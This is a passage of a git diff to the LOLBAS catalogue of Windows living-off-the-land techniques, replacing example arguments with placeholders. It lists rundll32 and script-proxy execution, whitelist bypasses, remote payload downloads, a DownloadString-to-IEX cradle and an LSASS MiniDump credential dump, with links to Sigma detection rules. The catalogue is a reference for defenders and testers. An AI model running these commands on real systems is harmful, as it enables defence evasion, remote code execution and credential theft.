10, Windows 11 - - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\\\Desktop\\\\test.json &&\"" - Description: Edge will silently download the file. - Usecase: Download file from the internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10, Windows 11 - - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\"" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index a71093b..cd61d40 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -4,8 +4,8 @@ Description: msedgewebview2.exe is the executable file for Microsoft Edge WebVie Author: Matan Bahar Created: 2023-06-15 Commands: - - Command: msedgewebview2.exe --no-sandbox --browser-subprocess-path="C:\Windows\System32\calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --no-sandbox --browser-subprocess-path="{PATH_ABSOLUTE:.exe}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: Low privileges @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --utility-cmd-prefix="{CMD}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User @@ -22,8 +22,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="{CMD}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User @@ -31,8 +31,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" - Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. + - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="{CMD}" + Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index b83e0e7..e6249e9 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -4,8 +4,8 @@ Description: Windows Terminal Author: Nasreddine Bencherchali Created: 2022-07-27 Commands: - - Command: wt.exe calc.exe - Description: Execute calc.exe via Windows Terminal. + - Command: wt.exe {CMD} + Description: Execute a command via Windows Terminal. Usecase: Use wt.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index f445a41..96dfe94 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -4,7 +4,7 @@ Description: Utility for installing software and drivers with rundll32.exe Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, + - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe advpack.dll,RegisterOCX test.dll + - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe + - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute @@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" + - Command: rundll32 advpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 935a6f5..d229b16 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -4,7 +4,7 @@ Description: Desktop Settings Control Panel Author: Hai Vaknin Created: 2022-04-21 Commands: - - Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr + - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr} Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr + - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr} Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 3796255..f7c0a06 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -1,11 +1,11 @@ --- Name: Dfshim.dll Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL} + Description: Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting Category: AWL Bypass Privileges: User @@ -19,8 +19,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index bda0f4c..cebde4a 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -4,7 +4,7 @@ Description: INF installer for Internet Explorer. Has much of the same functiona Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, + - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll + - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe + - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute @@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" + - Command: rundll32 ieadvpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index e75c0a6..0aae8f1 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -4,9 +4,9 @@ Description: Internet Browser DLL for translating HTML code. Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" + - Command: rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index a7701fe..5b4392d 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" + - Command: rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta} Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)." Usecase: Launch an HTA application. Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 407d41c..3ae7f0f 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe + - Command: rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe} Description: Launch executable by calling the LaunchApplication function. Usecase: Launch an executable. Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll -Code_Sample: - - Code: Detection: - Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml diff --git a/yml/OSLibraries/Scrobj.yml b/yml/OSLibraries/Scrobj.yml index 405546f..838d76a 100644 --- a/yml/OSLibraries/Scrobj.yml +++ b/yml/OSLibraries/Scrobj.yml @@ -4,8 +4,8 @@ Description: Windows Script Component Runtime Author: Eral4m Created: 2021-01-07 Commands: - - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe - Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\\payload[1].exe. + - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe} + Description: Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache. Usecase: Download file from remote location. Category: Download Privileges: User diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index b6836b6..c4a41d3 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -4,7 +4,7 @@ Description: Windows Setup Application Programming Interface Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 52e973e..cf11679 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -4,7 +4,7 @@ Description: Shell Doc Object and Control Library. Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" + - Command: rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 4848867..69d05f2 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -4,7 +4,7 @@ Description: Windows Shell Common Dll Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll + - Command: rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll} Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe + - Command: rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe} Description: Launch an executable by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" + - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args} Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute @@ -34,8 +34,6 @@ Commands: Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml diff --git a/yml/OSLibraries/Shimgvw.yml b/yml/OSLibraries/Shimgvw.yml index 257816c..d878a09 100644 --- a/yml/OSLibraries/Shimgvw.yml +++ b/yml/OSLibraries/Shimgvw.yml @@ -4,7 +4,7 @@ Description: Photo Gallery Viewer Author: Eral4m Created: 2021-01-06 Commands: - - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe + - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe} Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'. Usecase: Download file from remote location. Category: Download diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 3b01659..720d513 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -4,7 +4,7 @@ Description: Windows NT System Setup Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf + - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window). Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf + - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 608f69d..2332197 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -4,7 +4,7 @@ Description: Internet Shortcut Shell Extension DLL. Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" + - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta} Description: Launch a HTML application payload by calling OpenURL. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute @@ -13,9 +13,9 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. + - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url} + Description: Launch an executable payload via proxy through a .url (information) file by calling OpenURL. + Usecase: Load an executable payload by calling a .url file. Category: Execute Privileges: User MitreID: T1218.011 @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe + - Command: rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe} Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. Category: Execute @@ -61,8 +61,6 @@ Commands: Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index a7c1355..8cd8745 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -4,7 +4,7 @@ Description: Compressed Folder library Author: LOLBAS Team Created: 2018-05-25 Commands: - - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe + - Command: rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe} Description: Launch an executable payload by calling RouteTheCall. Usecase: Launch an executable. Category: Execute diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 7b60af7..caabccb 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -4,7 +4,7 @@ Description: COM+ Services Author: LOLBAS Team Created: 2019-08-30 Commands: - - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full + - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. Category: Dump @@ -24,4 +24,3 @@ Resources: - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Acknowledgement: - Person: modexp - Handle: diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index a57f1b9..8b78eb0 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -15,8 +15,6 @@ Commands: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml Resources: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index b23da74..58b32e9 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -1,10 +1,10 @@ --- Name: CL_Mutexverifiers.ps1 Description: Proxy execution with CL_Mutexverifiers.ps1 -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 + - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess {PATH:.ps1} Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute @@ -19,8 +19,6 @@ Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml Resources: diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 963cf0b..caf3f20 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -1,10 +1,10 @@ --- Name: CL_Invocation.ps1 Description: Aero diagnostics script -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke [args] + - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke {CMD} Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute @@ -17,8 +17,6 @@ Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml index 72d32fb..072279a 100644 --- a/yml/OSScripts/Launch-VsDevShell.yml +++ b/yml/OSScripts/Launch-VsDevShell.yml @@ -4,7 +4,7 @@ Description: Locates and imports a Developer PowerShell module and calls the Ent Author: 'Nasreddine Bencherchali' Created: 2022-06-13 Commands: - - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath "C:\windows\system32\calc.exe"' + - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}' Description: Execute binaries from the context of the signed script using the "VsWherePath" flag. Usecase: Proxy execution Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' + - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; {PATH:.exe} ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index 4b1441c..3678db6 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -1,10 +1,10 @@ --- Name: Manage-bde.wsf Description: Script for managing BitLocker -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf + - Command: set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. Usecase: Proxy execution from script Category: Execute @@ -24,8 +24,6 @@ Commands: - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml - IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index 18985ac..8714a3a 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -1,10 +1,10 @@ --- Name: Pubprn.vbs Description: Proxy execution with Pubprn.vbs -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct + - Command: pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct} Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 7f71efb..fc1c0f9 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -1,10 +1,10 @@ --- Name: Syncappvpublishingserver.vbs Description: Script used related to app-v and publishing server -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" + - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" Description: Inject PowerShell script code with the provided arguments Usecase: Use Powershell host invoked from vbs script Category: Execute diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index cb86feb..4c456d5 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -15,8 +15,6 @@ Commands: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: Detection: - Sigma: 